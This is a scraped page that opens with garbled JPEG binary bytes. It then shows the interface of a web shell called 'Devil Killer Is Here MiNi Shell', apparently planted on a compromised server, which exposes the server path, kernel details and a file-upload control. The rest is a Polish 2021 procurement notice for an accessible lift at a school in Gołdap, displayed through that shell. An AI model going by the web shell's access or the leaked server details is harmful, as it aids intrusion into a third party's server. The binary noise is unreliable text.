JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210712/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210712/0011094301-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00110943 z dnia 2021-07-12</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Rozbudowa infrastruktury oświatowej w powiecie gołdapskim.<br/>Dobudowa windy zewnętrznej dla niepełnosprawnych przy budynku ZPEW w Gołdapi” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZESPÓŁ PLACÓWEK EDUKACYJNO-WYCHOWAWCZYCH W GOŁDAPI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 281523480</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wojska Polskiego 18</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gołdap</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">19-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL623 - Ełcki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">876151160</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">876154933</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zpewgoldap@gmail.com</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zpewgoldap.bip.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Rozbudowa infrastruktury oświatowej w powiecie gołdapskim.<br/>Dobudowa windy zewnętrznej dla niepełnosprawnych przy budynku ZPEW w Gołdapi” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-42a1014f-e2e8-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00110943</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00007559/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Rozbudowa infrastruktury oświatowej w powiecie gołdapskim. Dobudowa windy zewnętrznej dla niepełnosprawnych przy budynku ZPEW w Gołdapi</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zpewgoldap.bip.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy<br/>użyciu https://miniportal.uzp.gov.pl/ ePUAPu https://epuap.gov.pl/wps/portal .</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia musi posiadać konto<br/>ePUAP. Posiadając konto na ePUAP Wykonawca ma dostęp do formularzy: złożenia, zmiany,<br/>wycofania oferty lub wniosku oraz do formularza do komunikacji. Wymagania techniczne i<br/>organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP. Maksymalny<br/>rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia, zmiany,<br/>wycofania oferty oraz do komunikacji wynosi 150MB. Ofertę składa się pod rygorem nieważności w<br/>formie elektronicznej lub w postaci elektronicznej w formacie danych .pdf, .doc, .docx., .rtf, .xps, .odt<br/>opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.U.UE.L.2016.119.1 z<br/>4.05.2016 r.) – dalej RODO, informujemy, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Zespół Placówek Edukacyjno-Wychowawczych<br/>w Gołdapi z siedzibą ul Wojska Polskiego 18, 19-500 Gołdap, 87 615 11 60; zpewgoldap@gmail.com.<br/>2. W sprawie sposobu i zakresu przetwarzania Pana/Pani danych osobowych oraz przysługujących<br/>Pani/Panu uprawnień, może się Pani/Pan skontaktować z Inspektorem Ochrony Danych Panią Anetą<br/>Frydrych, ul. Krótka 1, 19-500 Gołdap (tel. (87) 615 44 19, e-mail: iod@powiatgoldap.pl);<br/>3. Pani/Pana dane osobowe przetwarzane będą w celu związanym z postępowaniem o udzielenie<br/>zamówienia publicznego ZPEW.272.3.2021 prowadzonym w trybie podstawowym bez negocjacji,<br/>archiwalnym oraz statystycznym. Podstawą prawną przetwarzania tych danych jest art. 6 ust. 1 lit. c<br/>RODO w związku z art. 44 ustawy z dnia 27 sierpnia 2009 roku o finansach publicznych (Dz. U. z 2021<br/>r., poz. 305 ze zm.);<br/>4. Pani/Pana dane osobowe będą przekazane osobom lub podmiotom, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 uPzp;<br/>5. Dane osobowe mogą być przekazane kurierom oraz podmiotom świadczącym usługi pocztowe;<br/>6. Administrator nie zamierza przekazywać Pani/Pana danych osobowych do państwa trzeciego lub<br/>organizacji międzynarodowej;<br/>7. Pani/Pana dane osobowe będą przechowywane do momentu wygaśnięcia obowiązku<br/>przechowywania danych wynikającego z przepisów, tj. przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia zgodnie z art. 78 ust. 1 uPzp;<br/>8. Przysługuje Pani/Panu prawo do dostępu do swoich danych osobowych, prawo ich sprostowania,<br/>usunięcia, ograniczenia ich przetwarzania, prawo do przenoszenia danych oraz prawo wniesienia<br/>sprzeciwu;<br/>9. W zakresie udostępnienia danych w BIP przysługuje Pani/ Panu prawo do wniesienia sprzeciwu<br/>wobec przetwarzania;<br/>10. Przysługuje Pani/Panu również prawo wniesienia skargi do organu nadzorczego Prezesa Urzędu<br/>Ochrony Danych Osobowych;<br/>11. Pani/Pana dane osobowe nie będą podlegały zautomatyzowanemu podejmowaniu decyzji, w tym<br/>profilowaniu, stosownie do art. 22 RODO;<br/>12. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących<br/>jest wymogiem ustawowym określonym w przepisach uPzp związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego. Podanie danych osobowych jest niezbędne i wynika z wyżej</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZPEW272.3.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Rozbudowa infrastruktury oświatowej w powiecie gołdapskim. Dobudowa windy zewnętrznej<br/>dla niepełnosprawnych przy budynku ZPEW w Gołdapi ”. Budynek szkoły zostanie rozbudowany<br/>o windę z 4 przystankami i wiatrołapem umożliwiającym dostęp dla osób niepełnosprawnych<br/>oraz osób poruszających się na wózkach inwalidzkich z poziomu przy wejściu do budynku.<br/>Przedmiotem zamówienia jest wykonanie i oddanie zgodnie z dokumentacją projektową,<br/>specyfikacją techniczną wykonania i odbioru robót budowlanych, przepisami, w tym technicznobudowlanymi<br/>oraz zasadami wiedzy technicznej i sztuki budowlanej, przedsięwzięcia pn.<br/>„Rozbudowa infrastruktury oświatowej w powiecie gołdapskim. Dobudowa windy zewnętrznej<br/>dla niepełnosprawnych przy budynku ZPEW w Gołdapi ” w zakresie określonym :<br/>a) Projekcie budowlanym;<br/>b) Specyfikacji technicznej wykonania i odbioru robót budowlanych;<br/>c) Przedmiarach robót;<br/>2. Opis robót budowlanych:<br/>Budynek szkoły rozbudowuję się o windę o konstrukcji żelbetowej docieplonej wraz z<br/>wiatrołapem z 4 przystankami, która umożliwi dostęp dla osób niepełnosprawnych oraz osób<br/>poruszających się na wózkach inwalidzkich z poziomu przy wejściu do budynku.<br/>Ogólny zakres robót budowlanych do wykonania związanych z rozbudową:<br/>a) teren zewnętrzny:<br/>- rozebranie nawierzchni z kostki betonowej<br/>- rozebranie krawężników betonowych<br/>- demontaż panela ogrodzeniowego i ponowny montaż<br/>- powiększenie nawierzchni typu polbruk<br/>- wstawienie dodatkowej furtki<br/>- wywiezienie ziemi i gruzu z terenu rozbiórki<br/>- montaż i demontaż urządzeń na placu zabaw<br/>b) budynek szkoły:<br/>- demontaż okien<br/>- wykucie z muru podokienników<br/>- wykucie z muru ościeżnic<br/>- rozbiórka izolacji cieplnej ze styropianu<br/>- rozebranie ścian, filarów i kolumn z cegieł<br/>- rozebranie murów z bloczków z betonu<br/>w obrębie piwnicy:<br/>- zamurowanie otworu okiennego<br/>w obrębie parteru:<br/>- likwidacja dwóch par drzwi oraz poszerzenie otworów drzwiowych<br/>- montaż drzwi na korytarzu<br/>- okładziny posadzek w miejscu komunikacji między klatką schodową a wejściem<br/>do windy.<br/>- przeniesienie grzejników<br/>Roboty towarzyszące ww. tynki, posadzki, podłogi, powłoki malarskie itp.<br/>w obrębie I piętra:<br/>- likwidacja dwóch par drzwi oraz poszerzenie otworów drzwiowych<br/>- likwidacja aneksu kuchennego ( likwidacja podejść wod-kan.)<br/>- zamurowanie otworu do pokoju nauczycielskiego z aneksu kuchni<br/>- wybicie nowego pionu wod-kan w pokoju nauczycielskim<br/>- przeniesienie grzejników<br/>- montaż w korytarzu dodatkowych drzwi<br/>- nowe okładziny posadzek w miejscu komunikacji między klatką schodową,<br/>a wejściem do windy.<br/>Roboty towarzyszące ww. tynki, posadzki, podłogi, powłoki malarskie itp.<br/>w obrębie II piętra:<br/>- likwidacja dwóch par drzwi<br/>- poszerzenie otworów drzwiowych w miejscu wejścia do windy<br/>- montaż w korytarzu dodatkowych drzwi<br/>- nowe okładziny posadzek w miejscu komunikacji między klatką schodową<br/>a wejściem do windy<br/>- przeniesienie grzejników<br/>Roboty towarzyszące ww. tynki, posadzki, podłogi, powłoki malarskie itp.<br/>c) Szyb windy i wiatrołap<br/>Dokładny ich opis i kształt został ujęty w opisie konstrukcji i pokazany na rysunkach<br/>konstrukcyjnych.<br/>d) Dźwig<br/>- Montaż dźwigu osobowego o szybkości do 1 m/s z drzwiami półautomatycznymi<br/>o nośności do 1000 kg przystosowany dla osób niepełnosprawnych z napędem<br/>elektrycznym.<br/>Kabina Metalowa, przelotową , wyposażona min w:<br/>-cyfrowy wyświetlacz LCD informujący o aktualnym kierunku jazdy<br/>-gotowy do podłączenia z siecią telefoniczna układ automatycznej łączności ze<br/>wskazanym telefonem alarmowym (linie telefoniczna do maszynowni zapewnia-<br/>Zamawiający)<br/>-kurtyny świetlne w wejściach<br/>-wentylator mechaniczny załączany automatycznie<br/>-sygnalizacje przeciążenia graficzna lub dźwiękowa<br/>-kasetę ze stali nierdzewnej na pełna wysokość kabiny z obniżonymi i podświetlanymi<br/>na niebiesko przyciskami z grafika Braill'a<br/>-listwy przypodłogowe ze stali nierdzewnej<br/>-poręcze okrągłe ze stali polerowanej<br/>-lustro typu panel<br/>-oświetlenie stałe LED w suficie podwieszanym<br/>-oświetlenie awaryjne akumulatorowe<br/>-mechanizm zjazdu awaryjnego<br/>-dostosowana dla osób niepełnosprawnych poruszających się na wózkach<br/>Drzwi kabinowe automatyczne<br/>Teleskopowe 2 skrzydłowe o wymiarach 900 x2000 mm<br/>-napęd silnikiem z regulacją częstotliwościową prędkości zamykania i otwierania<br/>-wyposażone w układ automatyki powodujący ponowne otwieranie drzwi po trafieniu<br/>zamykających się skrzydeł na przeszkodę<br/>Drzwi szybowe automatyczne przeszklone szkłem bezpiecznym w ramkach ze<br/>stali nierdzewnej szczotkowanej "satyna"; teleskopowe 2 skrzydłowe o wymiarach<br/>900 2000 mm. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45262800-9 - Rozbudowa budynków</p> <p class="mb-0">45313100-5 - Instalowanie wind</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Całkowita liczba punktów, jaką otrzyma dana oferta zostanie obliczona wg<br/>poniższego wzoru: Całkowita liczba punktów = punkty uzyskane w kryterium „Cena ofertowa” + „Okres gwarancji”.Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z<br/>dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki. Zamawiający udzieli<br/>zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym<br/>w SWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria oceny ofert.Jeżeli nie<br/>będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert<br/>przedstawia taki sam bilans ceny i pozostałych kryteriów oceny ofert, Zamawiający spośród tych ofert dokona wyboru oferty zgodnie z art. 248 uPzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:a)<br/>zdolności do występowania w obrocie gospodarczym:Zamawiający nie stawia warunku w<br/>powyższym zakresie.b) uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o ile wynika to z odrębnych przepisów:Zamawiający nie stawia warunku w<br/>powyższym zakresie.c) sytuacji ekonomicznej lub finansowej:Zamawiający nie stawia warunku<br/>w powyższym zakresie.d) zdolności technicznej lub zawodowej:Wykonawca spełni warunek,<br/>jeżeli:▪ przedłoży wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5<br/>lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy –<br/>w tym okresie, wraz z podaniem rodzaju robót, ich wartości, daty i miejsca wykonania oraz<br/>podmiotów, na rzecz których roboty te zostały wykonane oraz załączeniem dowodów<br/>określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz<br/>którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od<br/>niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;▪ przedłoży wykaz osób skierowanych do realizacji zamówienia publicznego i dowiedzie, że dysponuje<br/>osobami odpowiedzialnymi za kontrolę jakości i kierowanie robotami budowlanymi (wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnymi do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy,<br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie<br/>dokumenty załącznik<br/>nr 4 do SWZ; Wykonawca winien wykazać, że wykonał należycie oraz zgodnie z przepisami<br/>prawa budowlanego i prawidłowo ukończył nie wcześniej niż w okresie ostatnich 5 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie:- dwa<br/>zamówienia o wartości minimum 100 000,00 zł brutto każde polegające na wykonaniu robót<br/>budowlanych. Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – załącznik nr 5 do<br/>SWZ;Wykonawca winien wykazać, że dysponuje lub będzie dysponował:- min. 1 osobą, która będzie<br/>pełniła funkcję kierownika budowy przy realizacji zamówienia,z uprawnieniami budowlanymi do<br/>kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej według obecnych<br/>przepisów Prawa Budowlanego lub odpowiadające im uprawnienia uzyskane według wcześniej<br/>obowiązujących przepisów Prawa Budowlanego;- min. 1 osobą z uprawnieniami budowlanymi do<br/>kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych<br/>według obecnych przepisów Prawa Budowlanego lub odpowiadające im uprawnienia uzyskane według<br/>wcześniej obowiązujących przepisów Prawa Budowlanego.<br/>Uwaga: Jedna osoba może pełnić obie powyższe funkcje.</span> </h3> <h2 class="bg-light p-3 